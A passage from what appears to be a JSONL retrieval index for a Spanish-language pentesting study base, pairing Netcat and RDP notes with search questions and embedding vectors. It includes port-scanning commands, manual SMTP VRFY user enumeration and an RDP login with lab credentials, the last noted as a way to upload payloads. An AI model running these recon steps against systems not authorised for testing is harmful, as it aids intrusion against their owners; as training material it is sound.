-0.00805, 0.03112, -0.02356, 0.00056, -0.00639, -0.04594, -0.06573, -0.0018, -0.00096, -0.01477, -0.04205, -0.00649, -0.05514, -0.05818, -0.00146, -0.03769, -0.02742, -0.05388, -0.01128, 0.0561, -0.02742, 0.03006, -0.03673]} +{"tipo": "pregunta", "herramienta": "Netcat", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Netcat.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "# Netcat (recon)\n\n> Solo para protocolos de **texto**: SMTP, HTTP, POP3... Para shells ver Reverse shell y Egress filtering.", "indexar": "con que puedo hacer recon de protocolos sencillos sin usar shells", "v": [0.18606, 0.03741, -0.20069, -0.05618, 0.01655, -0.11949, -0.00061, -0.14605, 0.00926, 0.01238, -0.11659, 0.09075, 0.07469, -0.1109, 0.00696, -0.01605, -0.05556, 0.03747, -0.02244, -0.03411, -0.06363, -0.07648, -0.14762, 0.02247, 0.03341, -0.00168, 0.10533, 0.0186, -0.05548, -0.05007, -0.09743, -0.03784, 0.10838, -0.00586, -0.10053, 0.04987, -0.04342, 0.0676, 0.01402, 0.02106, -0.12444, 0.00299, -0.13764, 0.07622, 0.05945, 0.02136, -0.04486, -0.07244, -0.05455, 0.0284, -0.03273, -0.00341, -0.18054, 0.03761, -0.10093, -0.06531, 0.09657, -0.07852, 0.02238, -0.00106, -0.05561, -0.03861, 0.13861, 0.07987, 0.07564, -0.07337, -0.03781, -0.00934, -0.06703, 0.03584, 0.037, 0.04295, 0.06817, 0.00912, 0.03418, 0.02292, -0.07238, -0.10885, 0.09164, 0.0924, -0.07904, -0.07941, 0.06267, -0.01806, -0.0283, -0.05527, -0.07468, -0.06839, 0.03121, -0.16643, -0.01332, -0.07929, 0.00886, -0.0683, 0.09232, -0.06161, -0.0815, 0.1325, -0.01591, 0.07744, 0.00772, -0.09921, -0.02171, 0.13708, -0.01151, -0.02059, 0.03453, -0.07432, 0.00459, -0.03368, -0.02523, -0.06281, -0.11533, -0.04965, -0.10776, 0.069, -0.07795, -0.06996, -0.09139, -0.04976, 0.02411, -0.07948, -0.02967, 0.03923, 0.04863, -0.00267, -0.03556, 0.14873, 0.03619, -0.02756, -0.03416, 0.03045, -0.02664, -0.02005, 0.01507, 0.05566, 0.01503, -0.02344, -0.00416, -0.04801, 0.04462, 0.07857, -0.16859, 0.0169, 0.07039, 0.02675, 0.03415, -0.07394, -0.11618, -0.04415, 0.07285, 0.04317, -0.06262, 0.03368, -0.09829, -0.04872, 0.05281, -0.00484, 0.00653, -0.00809, -0.06478, 0.03322, -0.01656, 0.03471, 0.07129, -0.03344, -0.06859, -0.03383, 0.00288, 0.01341, 0.01368, 0.08505, 0.00888, -0.03538, 0.05363, 0.01753, -0.08549, -0.01196, -0.00303, -0.031, 0.00346, 0.01499, -0.06066, -0.05825, 0.0253, -0.04931, 0.02732, 0.07166, -0.01508, 0.00945, -0.00872, 0.02849, 0.05429, 0.12045, -0.03665, 0.04724, 0.04855, 0.0201, -0.03085, -0.03397, 0.01894, 0.0206, 0.07192, -0.12714, 0.05624, 0.04436, -0.12662, 0.0253, 0.00301, 0.03271, 0.01746, 0.01201, 0.06633, 0.02049, -0.07273, 0.02599, -0.02554, 0.02507, 0.00807, 0.06109, 0.03559, 0.03692, -0.0061, 0.0151, 0.03633, 0.00837, -0.0435, -0.05487, 0.01171, -0.00953, -0.02491, 0.05561, -0.02421, -0.01238, -0.01789, 0.01863, -0.07135, -0.02772, -0.02748, 0.02802, -0.01989, 0.05377, -0.02952, -0.012, 0.03936, -0.03974, -0.06919, 0.00912, -0.01349, 0.01125, -0.03541, 0.02917, 0.04509, -0.00303, -0.0115, -0.03666]} +{"tipo": "pregunta", "herramienta": "Netcat", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Netcat.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "# Netcat (recon)\n\n> Solo para protocolos de **texto**: SMTP, HTTP, POP3... Para shells ver Reverse shell y Egress filtering.", "indexar": "cual es una alternativa a netcat si solo me interesan los protocolos de texto", "v": [-0.00199, 0.11729, -0.07517, 0.001, 0.06973, -0.15235, 0.04268, -0.08174, -0.11773, 0.0674, -0.06996, -0.0478, 0.05199, 0.01598, 0.06462, 0.08273, 0.13707, 0.02729, 0.22664, -0.12241, -0.09286, -0.14725, -0.13628, -0.0762, -0.05878, -0.07681, -0.08387, 0.09654, 0.04401, 0.0745, -0.14087, -0.05275, 0.03699, 0.03764, -0.0878, 0.01527, 0.15302, 0.10971, 0.03263, 0.07455, -0.04469, 0.00046, -0.12741, 0.05666, 0.04824, -0.06363, -0.14665, -0.00981, -0.02364, -0.05454, -0.02047, -0.00849, -0.01213, 0.10927, -0.06509, 0.1265, 0.20121, -0.08022, 0.00362, 0.0343, -0.01845, -0.03589, 0.01034, -0.03649, 0.04053, 0.0794, -0.01342, 0.00979, -0.11622, 0.06996, 0.12669, 0.03933, 0.03238, -0.034, -0.04955, 0.08124, -0.10111, -0.07797, 0.07631, 0.1075, -0.00519, 0.04015, 0.07272, 0.09355, -0.00669, -0.0402, 0.0055, -0.00382, 0.02994, -0.08515, 0.0321, 0.00247, -0.0192, -0.03735, -0.00918, -0.0816, 0.09029, 0.07677, 0.00498, 0.07883, -0.00317, 0.03664, -0.06812, -0.03779, 0.06994, -0.03453, -0.11268, 0.01793, -0.08358, -0.00824, -0.02173, 0.0735, 0.02964, 0.05371, -0.00852, -0.05138, -0.02541, 0.03711, 0.01948, -0.07782, -0.10927, 0.05476, -0.03353, -0.06992, 0.05935, -0.00844, 0.04488, 0.07658, 0.01742, 0.0307, 0.00725, -0.0528, -0.08645, -0.10613, -0.06517, -0.06247, 0.04066, 0.02991, -0.00495, 0.00933, 0.00315, 0.01751, -0.1074, 0.03998, 0.04796, -0.02266, 0.00624, -0.07751, -0.0153, -0.023, -0.09089, 0.01127, -0.00683, 0.09398, -0.08183, -0.04505, -0.01383, 0.01952, -0.04291, 0.04559, 0.01452, -0.00682, 0.01203, -0.02403, -0.04315, 0.04394, -0.11006, -0.10665, -0.00776, -0.04552, 0.01035, 0.08282, -0.00707, -0.011, -0.01412, -0.01616, -0.06743, -0.01257, -0.02476, 0.00989, 0.0173, 0.03621, -0.01649, -0.00401, 0.0368, -0.03134, 0.062, 0.00423, -0.05872, -0.02056, -0.0632, 0.00411, -0.07792, -0.00392, -0.03337, 0.02809, -0.00945, -0.02541, 0.00067, -0.06481, -0.02616, -0.0484, 0.04328, -0.03626, -0.02004, -0.0305, -0.06983, -0.04506, -0.02154, 0.08167, 0.08265, 0.03889, 0.07975, 0.04364, -0.07146, -0.03895, -0.01071, -0.05437, 0.05268, -0.01392, 0.06131, -0.04126, 0.00398, 0.00927, -0.00652, 0.03766, -0.04631, 0.02358, -0.06689, -0.02258, 0.00625, -0.06941, -0.02832, 0.06632, -0.00233, -0.01627, -0.04421, -0.05298, -0.05651, -0.05481, 0.00848, 0.02361, -0.03294, -0.02779, 0.0391, -0.00324, -0.11442, 0.02653, -0.08127, -0.02666, -0.02002, -0.0309, 0.04104, 0.02328, 0.0968, -0.05035]} +{"tipo": "pregunta", "herramienta": "Netcat", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Netcat.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## ConexiΓ³n y escaneo\n```bash\nnc -nv IP PUERTO # interactivo (host y puerto con ESPACIO, NO \":\")\nnc -nvz IP 1-1000 # modo scan (-z): solo comprueba si abre\nnc -nvz -u IP 161 # UDP (poco fiable β†’ mejor SNMP dedicado)\n```\n- **OJO**: `nc IP:PUERTO` = MAL. `-p` es puerto **origen**, no destino.\n- SNMP/SMB/DNS son **binarios** β†’ netcat NO sirve, usa la herramienta dedicada.", "indexar": "que programa hay para hacer un scan de puertos UDP?", "v": [0.04228, -0.10018, -0.11567, -0.17473, 0.06887, -0.03022, 0.12238, -0.10284, -0.06631, -0.03514, -0.03468, 0.03029, -0.01905, -0.19108, -0.25344, -0.09881, -0.00122, 0.01448, 0.06351, 0.00226, 0.01267, 0.07343, -0.01673, -0.01127, 0.01541, 0.01654, -0.07001, -0.00091, -0.05193, -0.00644, 0.05842, 0.08547, -0.02159, -0.07721, -0.01275, -0.13604, 0.11201, -0.00426, 0.19995, 0.14859, 0.03366, 0.01306, -0.05245, -0.07404, 0.11047, 0.01396, -0.01571, 0.04042, 0.06186, -0.05904, -0.08817, 0.03121, -0.03297, 0.00581, -0.03699, -0.02057, -0.05894, 0.02626, -0.01974, -0.07004, -0.0018, 0.09615, -0.01964, -0.0375, 0.01685, 0.00776, 0.01151, 0.05488, -0.14948, 0.04627, -0.07614, 0.00078, 0.04132, 0.00258, -0.06557, -0.09891, -0.07899, -0.03442, 0.0809, 0.02206, 0.01645, -0.03621, -0.03831, 0.07441, -0.08925, -0.05314, -0.07454, 0.07808, -0.02865, -0.07458, -0.03664, -0.06942, 0.01697, 0.16983, 0.05779, -0.0277, 0.06541, 0.07774, -0.01684, 0.13927, 0.03547, -0.03308, -0.09017, 0.05489, -0.02369, 0.06083, 0.04519, -0.0216, 0.00515, 0.08905, 0.04502, 0.0454, -0.05822, -0.12044, -0.08021, -0.02201, -0.05128, -0.06685, 0.01399, -0.05283, -0.04205, -0.04836, -0.06825, -0.01762, 0.06076, 0.00962, 0.01247, 0.10314, -0.01149, 0.08495, 0.0818, 0.0006, -0.12741, -0.03114, -0.12263, -0.07811, -0.00307, -0.10221, 0.00866, -0.00347, -0.09736, 0.12153, -0.02031, 0.05169, 0.03912, -0.01472, -0.03513, -0.04564, -0.05263, 0.02448, 0.0418, 0.04561, -0.05197, 0.03996, -0.02319, -0.04023, 0.07397, -0.05192, -0.05658, 0.05875, -0.02893, -0.02721, -0.06562, -0.0451, 0.08533, -0.01995, -0.02164, 0.07631, 0.01357, -0.02806, -0.05272, 0.13833, 0.00082, -0.09396, -0.00295, 0.01748, 0.02244, -0.05349, -0.00401, -0.02704, -0.09787, 0.08989, 0.07884, -0.0374, -0.00588, -0.06445, 0.01511, -0.03058, 0.03833, 0.01726, 0.00434, 0.036, -0.03089, 0.02846, 0.00352, 0.02154, 0.01851, 0.02597, 0.0513, -0.04443, -0.01237, -0.01438, 0.0738, -0.05935, 0.00874, 0.09163, -0.05033, 0.06091, 0.02104, 0.09421, 0.00379, -0.01995, 0.04413, 0.00554, -0.05351, 0.0024, -0.05376, 0.07689, 0.0876, 0.06132, -0.04614, 0.00549, -0.03681, 0.06694, -0.03476, -0.05833, 0.04321, 0.04943, 0.08503, 0.03019, 0.05847, 0.00744, -0.02914, -0.05844, 0.02534, 0.02358, -0.03964, 0.02482, -0.01819, -0.07981, 0.00085, -0.01114, 0.04687, -0.0217, 0.03398, 0.02098, -0.03444, 0.04693, 0.05912, 0.01973, -0.00533, 0.04231, 0.01765, -0.01582, 0.03529, -0.01531]} +{"tipo": "pregunta", "herramienta": "Netcat", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Netcat.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## ConexiΓ³n y escaneo\n```bash\nnc -nv IP PUERTO # interactivo (host y puerto con ESPACIO, NO \":\")\nnc -nvz IP 1-1000 # modo scan (-z): solo comprueba si abre\nnc -nvz -u IP 161 # UDP (poco fiable β†’ mejor SNMP dedicado)\n```\n- **OJO**: `nc IP:PUERTO` = MAL. `-p` es puerto **origen**, no destino.\n- SNMP/SMB/DNS son **binarios** β†’ netcat NO sirve, usa la herramienta dedicada.", "indexar": "con que puedo comprobar si un servicio en un puerto especΓ­fico estΓ‘ abierto pero no sΓ© quΓ© usar?", "v": [-0.13443, 0.15515, -0.30161, 0.02781, 0.01059, -0.0615, 0.11266, -0.15921, -0.09493, -0.25328, -0.19431, 0.07186, -0.01335, -0.08798, -0.01478, -0.08661, 0.02093, 0.00904, 0.07472, 0.10154, -0.00904, -0.08037, -0.02977, -0.11734, 0.0185, 0.07325, 0.0642, -0.02974, -0.12074, -0.01768, -0.075, 0.0598, 0.05474, -0.05217, -0.00434, -0.05779, 0.0776, 0.00392, 0.07686, 0.04635, 0.09773, 0.00547, -0.02988, 0.08084, 0.07838, 0.01181, -0.06133, -0.05788, -0.09156, 0.04535, 0.01193, -0.05571, -0.10403, -0.02527, -0.0815, 0.00634, 0.02633, 0.01415, 0.05796, -0.08919, -0.00235, -0.00827, 0.00519, -0.03228, 0.07355, -0.10914, -0.00387, 0.09698, -0.04204, -0.02485, -0.10378, -0.01858, 0.0349, 0.08455, -0.02139, -0.00089, -0.00703, -0.00085, 0.03732, 0.04608, 0.02716, 0.02802, -0.00792, -0.04827, -0.0358, -0.07366, 0.00872, -0.0576, 0.01499, -0.10824, 0.08602, 0.04835, -0.07021, 0.06287, -0.04928, 0.02414, -0.01949, 0.04721, -0.00255, 0.00864, 0.16433, 0.03038, -0.05199, 0.11675, -0.03078, -0.00785, 0.0013, -0.09251, 0.01253, -0.05296, 0.07494, -0.02196, -0.00215, -0.08001, -0.08574, -0.05011, -0.07042, -0.11172, -0.06028, -0.00618, -0.05609, -0.07184, 0.03672, -0.02473, 0.03322, -0.02411, 0.0142, 0.04965, 0.03839, 0.06181, -0.04003, -0.00375, -0.10302, -0.07042, -0.03011, -0.00802, -0.01395, -0.0629, -0.01042, 0.03587, -0.02212, 0.0261, -0.01551, -0.00926, 0.10502, 0.01634, -0.01866, -0.0733, -0.11522, -0.01936, 0.00905, -0.00555, 0.00638, 0.1029, -0.07017, 0.0658, 0.12043, -0.06852, -0.02512, 0.06892, -0.04601, 0.00027, -0.06665, 0.04042, 0.04735, -0.02508, -0.04683, -0.01263, 0.07091, -0.00664, -0.03678, 0.07615, -0.05977, -0.05319, 0.02881, -0.02414, -0.07696, -0.02507, -0.03616, -0.03886, -0.07711, -0.00568, -0.02613, -0.05984, -0.05243, -0.05743, 0.00421, -0.06041, -0.02332, 0.07541, -0.00112, 0.03113, 0.00409, -0.00254, -0.00194, 0.01636, -0.01652, 0.00175, -0.0338, -0.04778, -0.03969, 0.03083, -0.00218, -0.04147, 0.04072, 0.02154, -0.06994, 0.08328, -0.0155, 0.07603, 0.00675, -0.00583, 0.08749, -0.02393, -0.04248, 0.02915, 0.01932, 0.01046, -0.00312, 0.03084, -0.00622, 0.03713, 0.01707, 0.00594, 0.03471, 0.02539, 0.04579, -0.01183, 0.04823, 0.08865, -0.00876, 0.0432, -0.08138, -0.01244, -0.0226, 0.00803, 0.03308, -0.01324, -0.07204, -0.07098, 0.03245, 0.08433, -0.03523, -0.03889, 0.01448, -0.02824, -0.10024, 0.05109, -0.04928, -0.07067, -0.03836, 0.06919, 0.04338, -0.08946, 0.04664, -0.00491]} +{"tipo": "pregunta", "herramienta": "Netcat", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Netcat.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## ConexiΓ³n y escaneo\n```bash\nnc -nv IP PUERTO # interactivo (host y puerto con ESPACIO, NO \":\")\nnc -nvz IP 1-1000 # modo scan (-z): solo comprueba si abre\nnc -nvz -u IP 161 # UDP (poco fiable β†’ mejor SNMP dedicado)\n```\n- **OJO**: `nc IP:PUERTO` = MAL. `-p` es puerto **origen**, no destino.\n- SNMP/SMB/DNS son **binarios** β†’ netcat NO sirve, usa la herramienta dedicada.", "indexar": "necesito una alternativa a SNMP o SMB para escanear redes, ΒΏquΓ© herramienta sirve?", "v": [-0.1173, -0.10252, -0.1653, -0.09845, -0.04098, -0.16924, -0.3244, -0.20183, -0.0781, 0.01932, -0.11787, -0.05601, 0.11656, -0.20654, -0.00919, 0.17193, -0.07237, -0.11026, 0.14993, 0.09656, -0.05038, -0.02021, -0.04573, -0.05765, -0.06538, 0.00073, 0.02124, 0.07095, -0.15929, 0.04534, -0.09193, 0.0388, 0.02895, -0.03096, -0.09764, -0.01065, 0.06662, 0.02199, 0.06214, 0.0099, 0.03462, -0.02391, -0.08925, -0.05512, -0.00944, 0.03697, -0.08434, 0.00304, -0.09254, 0.1437, -0.03815, -0.0339, -0.1445, 0.0416, -0.10436, -0.04056, 0.16412, -0.08847, -0.05262, -0.04516, -0.05152, -0.03885, 0.03659, -0.07671, 0.00923, -0.08527, -0.0433, 0.00676, -0.05694, 0.02118, -0.0874, 0.05762, 0.08912, -0.03812, -0.06603, 0.05291, 0.02674, 0.01696, 0.0502, 0.07285, 0.08488, 0.0017, -0.06492, 0.00576, -0.03651, -0.0062, 0.10743, -0.0118, 0.01113, -0.05937, -0.05485, 0.11821, 0.02707, 0.07709, 0.00052, -0.06314, 0.02342, -0.07844, 0.05165, -0.04407, 0.08731, -0.0211, -0.07016, -0.00712, -0.03351, -0.02044, 0.00554, 0.01206, -0.04321, 0.0216, 0.02851, 0.05751, 5e-05, 0.04229, -0.00284, 0.0088, -0.00578, -0.0157, -0.01568, 0.00118, 0.02768, 0.03648, -0.07769, -0.07498, 0.00583, 0.00057, 0.0395, 0.00662, 0.04222, -0.02053, -0.01277, -0.05816, -0.02747, -0.06377, -0.05595, -0.07473, 0.02424, -0.11254, 0.00906, -0.05994, -0.04012, -0.06033, -0.07588, -0.12009, -0.03628, 0.03242, 0.05359, -0.08545, 0.00959, -0.01541, 0.07263, -0.03511, -0.08471, 0.02933, -0.00374, 0.02555, -0.05444, -0.00481, -0.12456, 0.06688, -0.0498, -0.07461, 0.08427, 0.028, -0.02125, -0.01808, -0.00917, 0.02181, -0.03245, 0.00397, 0.01264, 0.06052, 0.02563, -0.05583, 0.05115, -0.05563, -0.01083, -0.00793, 0.01383, -0.02327, -0.00931, -0.04264, -0.01817, 0.03629, 0.07065, -0.0338, 0.03802, -0.02823, -0.02274, 0.01846, -0.03565, -0.00255, 0.02002, -0.02537, 0.02933, 0.00264, 0.05427, -0.03903, 0.02635, 0.01031, -0.03308, 0.00724, -0.07582, -0.04477, 0.00876, 0.01101, -0.01176, -0.02474, 0.02943, 0.02873, -0.00297, -0.00975, 0.02012, -0.0047, 0.0378, -0.0478, 0.00674, 0.07054, 0.04518, 0.00163, 0.01932, -0.00636, 0.00022, 0.03313, -0.03023, 0.01832, -0.06245, -0.02329, -0.03245, -0.05385, 0.06278, -0.04774, 0.01473, 0.03068, 0.01786, -0.0781, -0.031, 0.0076, 0.00258, 0.0272, -0.03846, -0.03394, -0.02093, 0.06485, -0.03374, 0.00407, -0.0155, -0.05099, -0.03462, -0.03674, 0.01928, -0.01424, 0.03209, 0.01711, 0.02497, 0.02959]} +{"tipo": "pregunta", "herramienta": "Netcat", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Netcat.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## SMTP a mano (enumerar usuarios)\n```bash\nnc -nv IP 25\nVRFY root # 250 existe / 252 Postfix no confirma / 550 no existe\nQUIT\n```\n\nRelacionado: Operadores Bash Β· EnumeraciΓ³n Β· OSCP MOC", "indexar": "que comando sirve para ver si un usuario existe en el correo?", "v": [-0.10497, 0.07703, -0.19013, -0.09898, -0.03526, -0.15947, -0.00523, -0.02865, 0.00065, -0.16332, -0.06035, -0.14146, 0.10519, -0.09083, 0.01317, -0.04957, 0.18311, 0.08804, 0.04951, -0.04964, 0.06, -0.0003, 0.06219, -0.06538, -0.06873, 0.1053, 0.07956, -0.10527, -0.09629, -0.04895, 0.02384, 0.00787, 0.02436, -0.08326, -0.05664, 0.05876, -0.03274, -0.02966, -0.07291, 0.28959, -0.00225, 0.04406, -0.13459, 0.08755, -0.07737, 0.01617, 0.02415, -0.00796, 0.09032, 0.07957, 0.02137, -0.09038, -0.13396, 0.01604, -0.03152, 0.03169, 0.11276, -0.11773, 0.06793, -0.0447, -0.12039, -0.13053, 0.10035, 0.13933, -0.07764, -0.01854, -0.03408, -0.11157, -0.04487, -0.00049, -0.06584, 0.04639, -0.08804, 0.00149, 0.00345, -0.03397, -0.01593, 0.0417, 0.07034, 0.01727, 0.02675, 0.03401, -0.1205, -0.02538, -0.11148, -0.11954, 0.01608, -0.08676, 0.00037, -0.07786, 0.01485, 0.06288, 0.05083, 0.03054, 0.05067, 0.01528, -0.06433, -0.0094, 0.05141, 0.04992, 0.08415, 0.00712, -0.10314, 0.13146, 0.02322, 0.06745, 0.1221, -0.07213, -0.00018, 0.02783, 0.02475, -0.09676, -0.00224, -0.00374, -0.02795, -0.05529, -0.03619, -0.12872, -0.02247, -0.05265, -0.12013, 0.04295, 0.05601, 0.07662, 0.02115, -0.05011, -0.02423, 0.03121, 0.06302, 0.04076, -0.09316, -0.04508, 0.04341, -0.0532, -0.0152, 0.061, -0.01156, -0.02052, -0.08774, -0.04418, 0.03975, 0.1313, -0.08817, -0.02361, -0.01522, -0.0036, 0.04292, -0.05935, -0.05367, -0.04498, -0.01475, -0.02535, -0.0556, 0.04757, 0.01611, -0.00476, -0.02018, -0.03103, -0.0068, 0.04171, -0.0333, -0.03, -0.02842, 0.02762, -0.00778, -0.06103, -0.04617, -0.01775, 0.00016, 0.0678, -0.01945, 0.05377, 0.05099, -0.06827, 0.03145, -0.06375, 0.04772, 0.00898, -0.02574, 0.02643, 0.01979, 0.00316, -0.01613, 0.00399, -0.01899, -0.04383, -0.00548, 0.0219, -0.01252, 0.02898, -0.01272, 0.04996, 0.01684, -0.02252, -3e-05, -0.01936, 0.01801, -0.01407, -0.01328, -0.08894, -0.03434, 0.04415, 0.02068, -0.01025, 0.01235, -0.05637, -0.00949, 0.05522, 0.02968, -0.00028, 0.01152, 0.02519, -0.00375, -0.00512, -0.03332, -0.06003, 0.06167, 0.01553, -0.02645, -0.0244, -0.03594, -0.0223, -0.01827, -0.00026, 0.03282, 0.06023, -0.06738, -0.06364, 0.04766, 0.02245, 0.01506, 0.02201, 0.00894, 0.0041, 0.02025, -0.02269, 0.01901, 0.02254, 0.03038, -0.05526, -0.0335, 0.01976, -0.04797, -0.06239, -0.01149, -0.03206, -0.09237, -0.00123, -0.09694, -0.04167, -0.0064, -0.00745, -0.00504, -0.00449, 0.00324, 0.00176]} +{"tipo": "pregunta", "herramienta": "Netcat", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Netcat.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## SMTP a mano (enumerar usuarios)\n```bash\nnc -nv IP 25\nVRFY root # 250 existe / 252 Postfix no confirma / 550 no existe\nQUIT\n```\n\nRelacionado: Operadores Bash Β· EnumeraciΓ³n Β· OSCP MOC", "indexar": "con que puedo enumerar usuarios de un servidor SMTP desde la terminal?", "v": [-0.09932, -0.02093, -0.15123, -0.23598, -0.03617, -0.08485, -0.05465, -0.09368, 0.04511, 0.12937, -0.14633, 0.12118, 0.25971, -0.07302, 0.02763, 0.04589, 0.0557, -0.1738, 0.21643, 0.01842, 0.0867, 0.06124, 0.03114, 0.0126, 0.00246, 0.10541, -0.03372, -0.11764, -0.03648, -0.10023, 0.06821, -0.14499, 0.0347, -0.06426, 0.04092, -0.04642, 0.03538, 0.09972, -0.0067, 0.12344, 0.08875, -0.03286, -0.05567, 0.00653, 0.07007, 0.05747, 0.05171, -0.10797, 0.10217, -0.09858, -0.14024, -0.01449, -0.15063, -0.03911, -0.1056, 0.02267, 0.10157, -0.13938, 0.10069, -0.04253, -0.07775, 0.07393, -0.0125, 0.00996, 0.02323, 0.02819, -0.02141, 0.03689, -0.06236, 0.05025, -0.05804, 0.06642, 0.01485, -0.03337, 0.06838, 0.05324, -0.041, 0.01567, 0.1201, 0.09943, 0.00472, -0.03262, -0.05069, 0.01036, -0.07875, -0.08611, -0.01283, 0.05643, 0.03095, 0.03824, 0.06262, 0.08182, -0.03197, 0.06294, -0.02224, -0.06203, 0.03354, -0.08347, -0.00472, -0.02349, 0.05027, 0.13325, -0.03536, 0.12111, 0.02331, 0.02228, 0.08951, -0.09672, 0.08528, -0.06482, 0.04096, -0.07149, 0.03721, -0.02117, -0.09296, -0.06414, -0.03517, -0.01237, -0.00396, 0.0393, 0.00455, -0.08936, 0.00947, -0.01717, 0.06721, -0.01482, 0.06278, 0.03766, 0.07236, -0.06399, 0.00533, 0.00581, -0.02766, -0.02732, -0.06383, -0.00982, 0.04538, -0.08891, -0.0285, 0.05032, -0.00651, 0.05293, -0.05828, 0.0022, 0.09189, -0.01852, -0.02019, -0.05266, -0.09176, -0.04598, 0.07891, -0.03657, -0.09708, -0.04003, -0.05617, 0.03132, 0.02737, -0.03802, -0.07697, 0.06612, -0.00456, -0.02909, -0.02273, 0.04793, -0.01173, 0.0019, -0.06084, 0.00876, 0.04305, -0.02138, -0.00045, 0.01198, 0.01006, 0.00876, 0.02197, -0.03148, -0.04585, -0.00252, -0.00819, 0.02582, -0.04409, -0.03571, -0.00214, 0.00585, -0.04008, -0.08796, 0.00578, -0.00573, 0.0441, -0.01029, 0.01361, 0.06546, 0.02057, 0.05263, 0.03228, -0.0652, 0.03255, -0.00207, -0.05469, -0.05173, -0.01316, 0.01093, 0.01344, -0.02474, 0.02979, -0.02603, -0.06903, 0.05051, 0.05276, -0.01055, -0.00526, 0.01213, 0.04675, -0.03436, 0.01257, -0.02442, 0.02543, -0.00833, 0.0085, -0.01458, -0.01262, -0.01851, -0.02272, 0.02505, -0.0141, 0.00723, -0.01101, -0.00541, 0.05855, -0.00454, -0.01728, 0.00351, 0.00197, -0.03093, 0.03202, -0.01442, -0.00285, -0.02294, -0.02097, -0.03526, -0.01028, 0.05562, -0.0023, -0.02808, -0.02175, -0.03632, -0.03708, -0.04146, -0.06126, 0.00767, -0.029, -0.04091, 0.04871, -0.02658, -0.06009, -0.00265]} +{"tipo": "pregunta", "herramienta": "Netcat", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Netcat.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## SMTP a mano (enumerar usuarios)\n```bash\nnc -nv IP 25\nVRFY root # 250 existe / 252 Postfix no confirma / 550 no existe\nQUIT\n```\n\nRelacionado: Operadores Bash Β· EnumeraciΓ³n Β· OSCP MOC", "indexar": "cual es una tecnica para probar si un email tiene un usuario valido sin recibir confirmacion?", "v": [-0.12057, 0.06406, -0.22597, -0.04627, 0.04654, -0.14875, -0.02207, -0.05307, -0.01906, -0.17807, -0.10035, -0.12914, 0.12983, 0.0307, -0.0265, 0.02582, 0.15381, -0.04524, 0.13232, 0.01418, 0.05703, -0.07469, -0.12469, -0.17676, 0.00596, 0.05853, -0.00629, -0.0425, -0.00986, 0.04682, 0.14347, -0.03632, 0.04163, -0.04735, -0.00636, 0.12779, 0.02568, 0.08761, 0.02069, 0.15736, -0.0062, -0.07965, -0.00186, 0.01735, 0.03005, 0.0224, 0.04254, 0.02341, -0.0536, -0.02182, 0.02582, 0.06183, -0.16645, -0.07951, -0.06131, -0.07779, 0.13386, -0.11194, 0.159, -0.01609, 0.03573, -0.05728, 0.08241, 0.12202, -0.07611, -0.05595, 0.08724, -0.02643, -0.08168, 0.01517, 0.0856, 0.06184, -0.09212, -0.00173, -0.03714, -0.02672, 0.01536, 0.03397, 0.00244, -0.05503, 0.03345, -0.02033, -0.06561, -0.00498, -0.11302, -0.13508, 0.08277, -0.12671, -0.0018, -0.13213, 0.08448, 0.07553, 0.00985, 0.00911, 0.05962, -0.09594, -0.02568, -0.09394, -0.07396, 0.0023, 0.06916, -0.01404, -0.09122, 0.1109, -0.07774, 0.02856, 0.02977, -0.06361, 0.06442, -0.01597, -0.09042, -0.01723, -0.15815, 0.06223, -0.08403, -0.01982, -0.06308, -0.20407, -0.06346, -0.05204, -0.01323, 0.05902, -0.0426, -0.02412, 0.04415, -0.00058, 0.06844, 0.02948, 0.02019, 0.06633, -0.02102, -0.03776, -0.0038, 0.03697, -0.01949, 0.02387, -0.00762, -0.03225, -0.04123, -0.02601, 0.01815, 0.04613, -0.03496, -0.03882, 0.03897, 0.01337, -0.03425, -0.04321, -0.1121, 0.01749, -0.04034, -0.01174, 0.06104, 0.07336, -0.06022, -0.00827, 0.00206, -0.05363, 0.01837, 0.05925, -0.01262, 0.05817, 0.02522, 0.0103, -0.01668, -0.07242, -0.03164, -0.06353, -0.01818, 0.03581, -0.00458, 0.0162, -0.0654, -4e-05, 0.02052, -0.02503, -0.02493, 0.01905, -0.04669, -0.02698, -0.02349, -0.00187, -0.0152, -0.02572, -0.01921, -0.00369, -0.01182, 0.00087, 0.00863, 0.081, 0.00123, 0.03751, -0.0222, 0.03631, -0.02709, -0.0371, 0.01014, -0.03716, -0.01388, -0.04886, -0.03112, -0.0223, -0.01379, -0.00742, -0.02485, -0.02709, -0.03267, -0.05591, -0.07843, -0.01136, 0.04607, 0.00701, 0.02912, -0.00396, -0.02679, 0.01353, 0.0419, 0.02385, 0.01689, 0.02893, -0.03989, -0.01487, 0.00563, 0.02382, -0.00782, 0.05122, 0.00801, 0.02277, -0.01762, 0.01973, 0.02071, 0.05408, -0.03197, 0.02728, 0.03802, 0.05168, 0.05701, -0.00543, -0.04378, -0.04788, 0.0403, 0.07178, -0.00894, -0.01222, 0.00241, 0.00168, -0.09629, -0.01275, -0.07119, -0.06613, -0.00169, -0.0003, 0.0346, -0.00655, 0.05682, -0.00916]} +{"tipo": "pregunta", "herramienta": "RDP", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/RDP.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "# RDP\n\n> Escritorio remoto Windows (3389). **Acceso legΓ­timo** con credenciales: no necesita Reverse shell.\n\n```bash\nxfreerdp /u:student /p:lab /v:IP /cert:ignore /clipboard\nxfreerdp3 ... # si la versiΓ³n nueva\n```\n- `/clipboard` = **copiar-pegar entre Kali y Windows** (clave para subir scripts/payloads).\n- `/cert:ignore` = no protestar por el certificado del lab.", "indexar": "que programa permite copiar y 